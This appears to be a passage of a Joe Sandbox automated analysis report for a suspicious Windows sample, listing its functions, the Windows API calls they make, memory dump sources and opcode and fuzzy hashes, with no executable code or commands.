                                                            • Instruction Fuzzy Hash: 1DF0A4301143CCBADF191F548C0D7EEBBD8EF04355F048995FD44546A1EB78C990EA14
                                                            Function 00BE0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00BE1206,?), ref: 00BE0FEA
                                                            • GetLastError.KERNEL32(?), ref: 00BE0FF6
                                                              • Part of subcall function 00BD6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD6C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00BE0FFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: d9eea25f082a2fd5536222ba9098eb03a7ed24c968f7169b1d998c922da6e952
                                                            • Instruction ID: df2edf76874eb94c3c45df7d77ec3cef3cb79efdb15b850af57e43349e0a0e0e
                                                            • Opcode Fuzzy Hash: d9eea25f082a2fd5536222ba9098eb03a7ed24c968f7169b1d998c922da6e952
                                                            • Instruction Fuzzy Hash: DDD02B7150857076C61033245C05F6F7908CF12331F650755F238502F2CB2409819291
                                                            Function 00BDE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00BDDA55,?), ref: 00BDE2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00BDDA55,?), ref: 00BDE2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: 23d5742fe4e98543852f19e2a72f3c4f2874e5a6ee3a52fb2dc96fe38e05ad27
                                                            • Instruction ID: eabf8a486bfb3e9c365d3636296acbbae526f1435e6bfbab63088396635bbf87
                                                            • Opcode Fuzzy Hash: 23d5742fe4e98543852f19e2a72f3c4f2874e5a6ee3a52fb2dc96fe38e05ad27
                                                            • Instruction Fuzzy Hash: FEC0123124179066E63027656C4DB476A5C5B00B15F06045DB581E92D1DAA5C540C6A0

                                                            Execution Graph

                                                            Execution Coverage:7.7%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:4
                                                            Total number of Limit Nodes:0
                                                            execution_graph 7323 7ffd9becc56c 7325 7ffd9becc56f 7323->7325 7324 7ffd9becc6b6 QueryFullProcessImageNameA 7326 7ffd9becc714 7324->7326 7325->7324 7325->7325

                                                            Executed Functions

                                                            Function 00007FFD9BAD0D48 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5X_H
                                                            • API String ID: 0-3241812158
                                                            • Opcode ID: 0fbdc5e5d7798d2fe24f264f841035badd01008b0e8020429f47af263cf4cf1f
                                                            • Instruction ID: 92e2d1667a40a3d559f1aeacb604d9da732e64dd0e7cc4ecd05bc380bb1760f4
                                                            • Opcode Fuzzy Hash: 0fbdc5e5d7798d2fe24f264f841035badd01008b0e8020429f47af263cf4cf1f
                                                            • Instruction Fuzzy Hash: 76911571A19A8D4FE759DB6888767A87FE0FFA9714F5102BEE049C72E2CBB81400C741
                                                            Function 00007FFD9BECC56C Relevance: 1.7, APIs: 1, Instructions: 244COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1866309334.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bec0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID: FullImageNameProcessQuery
                                                            • String ID:
                                                            • API String ID: 3578328331-0
                                                            • Opcode ID: 87a5164043bd71c348779d6584b286891857f7e95cafb8b5a2c5187fbb8011ad
                                                            • Instruction ID: f34113c89ed5c609cdb788d00a52869b05167ab41916e18e2a9138d02795be47
                                                            • Opcode Fuzzy Hash: 87a5164043bd71c348779d6584b286891857f7e95cafb8b5a2c5187fbb8011ad
                                                            • Instruction Fuzzy Hash: 88718F30619A4D8FDB68EF68C8557F937E1FB58311F10423EE84EC7292DB75A9418B81
                                                            Function 00007FFD9BAD0910 Relevance: .1, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 98fec6040f7f0469032ecb657ad0aeffe448e41ac5617ba675848cdc7c4e100d
                                                            • Instruction ID: baecb49f27f24e2ec36356fa3e76ed1727b6a9d8d72377ad2ec7a72c49a026b4
                                                            • Opcode Fuzzy Hash: 98fec6040f7f0469032ecb657ad0aeffe448e41ac5617ba675848cdc7c4e100d
                                                            • Instruction Fuzzy Hash: 9E412811B0C5590FE315B7BCA4A96F87781EF99339B1406BBE44ECB1EBDD18A841C385
                                                            Function 00007FFD9BAD0960 Relevance: .1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e52c48491fd1d50ff2bf0a62668a762e4118d7d89f7601bbc25726abdbd5d73
                                                            • Instruction ID: c327264e5b85828a0db727838ab233aa95bd3785e74d20958b55518268eb4acc
                                                            • Opcode Fuzzy Hash: 2e52c48491fd1d50ff2bf0a62668a762e4118d7d89f7601bbc25726abdbd5d73
                                                            • Instruction Fuzzy Hash: 79310911B0C9190FE768B7AC646A6F933C1DF9833AB1446BBF40EC71EBDD19AC418284
                                                            Function 00007FFD9BAD0998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ae1c5464dcc1c4fe569e9c0d63bfd9a0059a3a03ad23039d4a3563d205e9e4
                                                            • Instruction ID: 80fb9ababc6eb3af18255ce7a55a2dc4a56c2f5c97fca7f140cc62d71cb48d65
                                                            • Opcode Fuzzy Hash: 77ae1c5464dcc1c4fe569e9c0d63bfd9a0059a3a03ad23039d4a3563d205e9e4
                                                            • Instruction Fuzzy Hash: A3212520B1891D0FE798BB6C946D77936C6EBA8324B5102B9E80EC32F7DD18AC014381
                                                            Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09197fab97c02b88ed4be90c2def0aa2c26d03ba5a59541a3374f56b44dde349
                                                            • Instruction ID: ba5f32b88479623ffe47dd8bbafe54ce0a11971045904aa98f94677b418d9123
                                                            • Opcode Fuzzy Hash: 09197fab97c02b88ed4be90c2def0aa2c26d03ba5a59541a3374f56b44dde349
                                                            • Instruction Fuzzy Hash: E7212C35B0E24D4EE332E7B898750EC7B70EF82326F5542B7D0548A1E3D9782646C785
                                                            Function 00007FFD9BAD2075 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09dc97ae45e4ae1a6696bb1720e6615abc34d9dc8cff82b2cb43596b98f827fc
                                                            • Instruction ID: 4ec77cec4d4e7a7b0cad507f5fcd0cd93375c0fb217b7e9684ada1dc135d39b7
                                                            • Opcode Fuzzy Hash: 09dc97ae45e4ae1a6696bb1720e6615abc34d9dc8cff82b2cb43596b98f827fc
                                                            • Instruction Fuzzy Hash: 86113331B19A1D8BEB74EBA8C4646B87391FFD4300F0246B5D44EC71A2DE686E41D644
                                                            Function 00007FFD9BAD1FE8 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eed27b315adab65c448eb62d3fd381587a2719f7d0807b3079c9afd5293c5fd5
                                                            • Instruction ID: 4742faf4f3cb0a6caaee14b5d57dde20396cd5bc39a76ac9446de62dca997f8d
                                                            • Opcode Fuzzy Hash: eed27b315adab65c448eb62d3fd381587a2719f7d0807b3079c9afd5293c5fd5
                                                            • Instruction Fuzzy Hash: 3D118F21F1EA1E5BE7B4AB98C4746B86291FFC8310F1247B5D80ED31E2DE686E40C680
                                                            Function 00007FFD9BAD449C Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 796cc71cd68638df97ad7881f79f242a187afdcc609c8dc9ca3f3804c39c1b47
                                                            • Instruction ID: 9e456a23c833a47ea57e7601ee44bd35e012cd6c6e1b9510d93e88211f4dcc3c
                                                            • Opcode Fuzzy Hash: 796cc71cd68638df97ad7881f79f242a187afdcc609c8dc9ca3f3804c39c1b47
                                                            • Instruction Fuzzy Hash: 6F11FE70D0852C8FDBA8DB08C494BA973E1EB64310F2541A9D44ED3271CF74AEC5CB45
                                                            Function 00007FFD9BAD5323 Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79b02e5083c614813de04328c230cb0ae317c8b89c93c06fb057494a2f2956bb
                                                            • Instruction ID: 6aed0a2572cf154bb8167164e1b8db025fdfb9fabb78d1f05b8d5e6845907474
                                                            • Opcode Fuzzy Hash: 79b02e5083c614813de04328c230cb0ae317c8b89c93c06fb057494a2f2956bb
                                                            • Instruction Fuzzy Hash: F9113C21F1AA0D8FEFB4E7A8807867822D1EFD4740B0645B5E00EC71B2DDA8AD418704
                                                            Function 00007FFD9BAD0C38 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d55924d105cb1584e9e1f8f9bda1ba9ec2b18277a49c8a4fe5c05e66c3194230
                                                            • Instruction ID: 80f3da79326f878b337a1c20839cbc0efc12cd5ef0c3d2c5b257171a9ac53c11
                                                            • Opcode Fuzzy Hash: d55924d105cb1584e9e1f8f9bda1ba9ec2b18277a49c8a4fe5c05e66c3194230
                                                            • Instruction Fuzzy Hash: 8A11E335B0E68D8FE722DBA888751DC7FB0EF82711F4642B7C084DB1A2D5781645C784
                                                            Function 00007FFD9BAD108D Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 546bb27242573d716b2ff03d090b273c24e9a89868df57a3b08f9c737ab1354d
                                                            • Instruction ID: 0299aac199817b67169b287a53b7f6dd10b60655ba81c20562c2495ad6047df6
                                                            • Opcode Fuzzy Hash: 546bb27242573d716b2ff03d090b273c24e9a89868df57a3b08f9c737ab1354d
                                                            • Instruction Fuzzy Hash: 7001F72194E6C51FD76557B05C729A13FA0CF9722070A06FAE089CB1A3C84D19868351
                                                            Function 00007FFD9BAD0C40 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 20a88906efef06bcd4aeeaf14eb3f720fdd5f53c6b0996164d9cd7d6a9e63f50
                                                            • Instruction ID: 41823f13ed2216ca73f3532008c6e2071ab62d4456a10dc06256979cf150b674
                                                            • Opcode Fuzzy Hash: 20a88906efef06bcd4aeeaf14eb3f720fdd5f53c6b0996164d9cd7d6a9e63f50
                                                            • Instruction Fuzzy Hash: 0211CE35B0E68C8FE722DBA8886419C7FB0EF82711F4642B7C084DB2A2D9786645C784
                                                            Function 00007FFD9BAD0C48 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e5673af1c22e079893ed9eec4230d12051d5038c163e0d4b2fefbb6f438415e
                                                            • Instruction ID: 3a43efe6dd6c6323e291d675cab27ce910d38a10676320fea4fae28effa4b0a1
                                                            • Opcode Fuzzy Hash: 4e5673af1c22e079893ed9eec4230d12051d5038c163e0d4b2fefbb6f438415e
                                                            • Instruction Fuzzy Hash: D9019235A0E38D9FD722DB64886419C7FB0EF82711F5642E7D084DB1A2D9786645C740
                                                            Function 00007FFD9BAD20A4 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction ID: 49cd45e355cb02de1765dc4e673738c277bd0321967db19c2e0e590c2563be82
                                                            • Opcode Fuzzy Hash: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction Fuzzy Hash: 17F03134E1991E8BEB74ABD4C8646F87360FB94311F1242B9D44ED31A1DEB86E85CA40
                                                            Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 294c77ad3b9098297149d05974670f6fd77183be8ee2355add871680e2ca8470
                                                            • Instruction ID: f7c8c829429c768fc2e5bdb9965249fe96ceb893ce704bc184dc1373c3e270b8
                                                            • Opcode Fuzzy Hash: 294c77ad3b9098297149d05974670f6fd77183be8ee2355add871680e2ca8470
                                                            • Instruction Fuzzy Hash: 7001BC34A0E38D9FE722DBA4886419C7FB0AF82701F5542E7C084CB2A2D9786A44C740
                                                            Function 00007FFD9BAD1AD2 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8c0b7b05d168d165f0ee1370f97a5adf80ccb921a8eadba5c0cf223eeeed9a4
                                                            • Instruction ID: af1408247b04ecf8c5f83cbc2dfebd5c3d1fc2bf212f8c39e04cdcca6dc90067
                                                            • Opcode Fuzzy Hash: a8c0b7b05d168d165f0ee1370f97a5adf80ccb921a8eadba5c0cf223eeeed9a4
                                                            • Instruction Fuzzy Hash: E8E03061F1E81E5FF6B0A79880643B812D1FBA8B10F5643B2D40DD32A2DDAC2D028385
                                                            Function 00007FFD9BAD3C45 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 062050ae159345b8d7ac1e957ed2aa36a7aa5082830678db98d0f8cb635a4810
                                                            • Instruction ID: 51e9708e32eb7bac10d59372e9197d3a9776d1aaea5a9a83395f814e1d70c726
                                                            • Opcode Fuzzy Hash: 062050ae159345b8d7ac1e957ed2aa36a7aa5082830678db98d0f8cb635a4810
                                                            • Instruction Fuzzy Hash: AAE0ED21F1A91D5FE6B4A75C84693BC22D2FBEC700F524376D40DD32A2DD6C2D428785
                                                            Function 00007FFD9BAD0D01 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9400922c4504c5271fa936df56a9fe2eebf87d3a013539dd861304df71eee8a
                                                            • Instruction ID: 310ff8428f562e5057bf2a98428f6f2e8e53b6f83fb1ab5ca15871fccaa1aba0
                                                            • Opcode Fuzzy Hash: f9400922c4504c5271fa936df56a9fe2eebf87d3a013539dd861304df71eee8a
                                                            • Instruction Fuzzy Hash: 54F0B431B0964E8EE774DB64C4B46BD77F0EF94711F50427AD009C32E5DA786680CB45
                                                            Function 00007FFD9BAD10C0 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d81ea3abc4b5d0f2cd6ab186def54774a6909d607d2edd3d4a69e2c7ee01cd6e
                                                            • Instruction ID: 978465e5ce2c89b21227428091aeba7e600d2488689956c59386fb5f8455fd12
                                                            • Opcode Fuzzy Hash: d81ea3abc4b5d0f2cd6ab186def54774a6909d607d2edd3d4a69e2c7ee01cd6e
                                                            • Instruction Fuzzy Hash: F6E02621B1C84906EB7CBA7468B26B17280DB95724B0506B9E01EC22DACC4D1CC14381
                                                            Function 00007FFD9BAD626F Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4aa4c8d1bda0f7e8db51d007f3015530dedacfdebdf34ebb1a3aa182d9c740c5
                                                            • Instruction ID: 001275ffafd2fa88e3f64edad2b779b4b4cb8a32f99377d9c068830664bcfce8
                                                            • Opcode Fuzzy Hash: 4aa4c8d1bda0f7e8db51d007f3015530dedacfdebdf34ebb1a3aa182d9c740c5
                                                            • Instruction Fuzzy Hash: FDE04F21F0A82D1FE6B1A71880683A812D2FBA8B00F1143B2D40CD3262DD6829428780
                                                            Function 00007FFD9BAD6A11 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction ID: cf40b1aaf93878febd25d3955ad5d99ca662de4784a2b51917a49fbe6e54aa08
                                                            • Opcode Fuzzy Hash: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction Fuzzy Hash: 33E0ED20F0901A4BFBB4A794D8647B962A1AFD4300F1241B4D80D932E2DDB86E818745
                                                            Function 00007FFD9BAD5384 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction ID: 24c312c5c4231feda41b8bd292561b98360c2acb7d8dee7cda6d2171dec40766
                                                            • Opcode Fuzzy Hash: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction Fuzzy Hash: BAE0EC24F0A80E4FEFA4E7A480786B822D29FE4750F0A41B4D40DC71B2DDA8A9018700
                                                            Function 00007FFD9BAD0835 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8974cfe7e02493159de27da9e18819952443e9b5c1a7f68d406fca6c3c14ca71
                                                            • Instruction ID: d8672fb132a5bb0cbea2143cbd48b7b93b7eb73c3f85e07f0941e10256806e61
                                                            • Opcode Fuzzy Hash: 8974cfe7e02493159de27da9e18819952443e9b5c1a7f68d406fca6c3c14ca71
                                                            • Instruction Fuzzy Hash: 4FC01210B5740D51D03473AEEC664ED7740EF88518FC64271E40D84096DC491587C196
                                                            Function 00007FFD9BAD0B9D Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1862945708.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction ID: 5a7a21ac3f80e21b15f332d6c5c9e33e4dce99864514c66e350543c344b6f1c4
                                                            • Opcode Fuzzy Hash: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction Fuzzy Hash: 60C0123062A80E8FDA80BB28C889924BBA0FB4E201BDA00E4E00CC71A1DA5998908700
